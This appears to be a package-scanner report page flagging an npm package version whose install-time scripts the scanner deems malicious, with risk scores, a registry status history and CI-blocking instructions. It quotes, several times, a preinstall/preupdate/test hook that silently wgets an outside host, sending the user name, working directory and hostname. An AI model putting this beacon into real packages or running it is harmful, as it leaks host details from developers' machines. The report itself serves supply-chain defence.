PkgRadar

Package evidence

@stockrepublic/[email protected]

Install-time lifecycle script: preinstall="wget --quiet \"http://o5i.cc/supp?user=$(whoami)&path=$(pwd)&hostname=$(hostname)\" "

Recommended action

Block this update

Static evidence trips multiple high-signal indicators. Quarantine the release until the publisher validates the change or you can rule out the indicators below.

Block this release in CIcurl · GitHub Actions

Fail the build when this package version is added or upgraded. Replace $PKGRADAR_TOKEN with a Pro / Team API key from your dashboard.

curl -fsS https://pkgradar.com/gate/npm \
  -H "Authorization: Bearer $PKGRADAR_TOKEN" \
  -H "Content-Type: application/json" \
  -d '{"specs":["@stockrepublic/[email protected]"],"fail_on":"high"}'

GitHub Actions step:

- name: PkgRadar gate
  run: |
    curl -fsS https://pkgradar.com/gate/npm \
      -H "Authorization: Bearer ${{ secrets.PKGRADAR_TOKEN }}" \
      -H "Content-Type: application/json" \
      -d '{"specs":["@stockrepublic/[email protected]"],"fail_on":"high"}'
Publisherstockrepublic
Artifact bytes809
Previous versionnone
Published2026-05-24T19:39:50.748Z
SHA-2569ecbf18f9550241c8d6027a658de6c58985ee6f15fb3fbebb5fd835fe1ba6d0f

Why flagged

What the scanner saw

Install-time lifecycle script: preinstall="wget --quiet \"http://o5i.cc/supp?user=$(whoami)&path=$(pwd)&hostname=$(hostname)\" "

1 candidate cluster(s) currently reference this release.

Not observed: package install, lifecycle script execution, or sandbox execution. PkgRadar only inspects on-disk artifacts.

Availability ledger

not present

status
Last checked
noneRisk
Score
99.0.0Version

Latest scanner note: @stockrepublic/[email protected] not present in registry metadata

Status history (2 events)
  1. availablenot_present · risk none · score · @stockrepublic/[email protected] not present in registry metadata
  2. newavailable · risk high · score 144 · status changed

Related candidates

Linked campaigns and clusters

Publisher / release actor burstactive

stockrepublic

2 members · evidence strength 65
Repeated static TTPstale

Install-time lifecycle script — install="node index.js"

2 members · evidence strength 70
Repeated static TTPstale

Install Lifecycle Remote Or Exec — install="node index.js"

2 members · evidence strength 70
Publisher / release actor burstcandidate

stockrepublic

2 members · max score 94

Evidence

Static findings

6 static · 0 from release diff · showing high-signal first.

SeverityKindPathDetailPoints
highInstall-time lifecycle scriptpackage.jsonpreinstall="wget --quiet \"http://o5i.cc/supp?user=$(whoami)&path=$(pwd)&hostname=$(hostname)\" "30
highInstall Lifecycle Remote Or Execpackage.jsonpreinstall="wget --quiet \"http://o5i.cc/supp?user=$(whoami)&path=$(pwd)&hostname=$(hostname)\" "30
highInstall-time lifecycle scriptpackage.jsoninstall="node index.js"30
highInstall Lifecycle Remote Or Execpackage.jsoninstall="node index.js"30
mediumRemote Payloadpackage/index.jsmatched "curl "12
mediumRemote Payloadpackage/package.jsonmatched "wget "12

Manifest

Package metadata

Scripts4
  • installnode index.js
  • preinstallwget --quiet "http://o5i.cc/supp?user=$(whoami)&path=$(pwd)&hostname=$(hostname)"
  • preupdatewget --quiet "http://o5i.cc/supp?user=$(whoami)&path=$(pwd)&hostname=$(hostname)"
  • testwget --quiet http://o5i.cc/supp?user=$(whoami)&path=$(pwd)&hostname=$(hostname)"